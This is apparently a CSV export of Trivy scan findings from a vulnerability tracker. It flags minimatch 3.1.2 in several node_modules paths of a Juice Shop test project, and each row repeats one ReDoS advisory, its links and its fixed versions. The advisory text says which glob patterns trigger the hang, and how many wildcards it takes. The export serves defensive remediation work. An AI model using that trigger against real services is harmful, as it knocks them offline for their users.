https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE 
https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.0.8,False,False,,2026-05-12 17:37:05.222226+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.226213+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,135,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.226267+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.226220+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.230048+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,136,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.230102+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.230056+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.233793+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/file-js/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,137,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.233847+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.233800+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.237828+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/fstream/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,138,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.237887+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.237837+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.241824+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,139,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.241879+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.241832+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.245482+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,140,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.245652+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.245601+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.249540+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/rimraf/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,141,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.249596+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.249548+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.253438+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,142,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.253516+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.253450+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
